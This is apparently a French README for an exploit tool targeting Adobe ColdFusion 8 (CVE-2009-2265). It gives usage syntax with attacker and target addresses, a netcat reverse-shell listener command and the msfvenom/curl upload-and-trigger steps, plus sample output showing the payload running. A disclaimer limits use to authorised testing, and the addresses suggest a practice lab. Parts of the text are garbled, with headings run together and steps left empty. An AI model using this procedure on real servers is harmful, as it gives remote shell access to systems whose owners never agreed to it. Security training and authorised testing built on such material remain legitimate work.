
Adobe ColdFusion 8 - Exécution de commande à distance (RCE)
Cet exploit cible une vulnérabilité connue dans Adobe ColdFusion 8 (CVE-2009-2265). Il permet l'exécution de commandes à distance (RCE) en téléchargeant une charge utile JSP malveillante qui établit une connexion reverse shell.
msfvenom.Pour utiliser cet exploit, vous avez besoin des éléments suivants :
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST> : Adresse IP de l'attaquant local (ex : 10.10.16.5).-p <LPORT> : Port local de l'attaquant pour le reverse shell (ex : 9001).-r <RHOST> : Adresse IP de la cible distante (ex : 10.10.10.11).-q <RPORT> : Port distant de la cible sur lequel ColdFusion s'exécute (ex : 8500)../CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
Démarrez un écouteur sur votre machine attaquante :
nc -lnvp 9001
Exécutez l'exploit avec les arguments appropriés.
Une fois exécuté, la charge utile se connectera à votre écouteur.
Génération de la charge utile :
msfvenom pour générer une charge utile JSP malveillante.Téléchargement de la charge utile :
Déclenchement de la charge utile :
Établissement du reverse shell :
msfvenom pour la génération de la charge utile.curl pour le téléchargement de fichier et le déclenchement de la charge utile.nc (Netcat) pour écouter les connexions reverse shell.[+] Génération de la charge utile reverse shell JSP...
[+] Charge utile enregistrée sous 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Téléchargement de la charge utile vers la cible...
[+] Réponse du serveur :
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] Attente du démarrage de l'écouteur Netcat sur le port 9001...
[+] Écouteur Netcat détecté en cours d'exécution sur le port 9001 !
[+] Tentative de déclenchement de la charge utile...
[+] Charge utile déclenchée avec succès. Vérifiez votre écouteur pour le reverse shell.
[+] Nettoyage des fichiers locaux...
[+] Terminé !
Ce script est fourni à des fins éducatives uniquement. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. Toute utilisation non autorisée de cet exploit sur des systèmes qui ne vous appartiennent pas est illégale et contraire à l'éthique.
Développé par [0xDTC].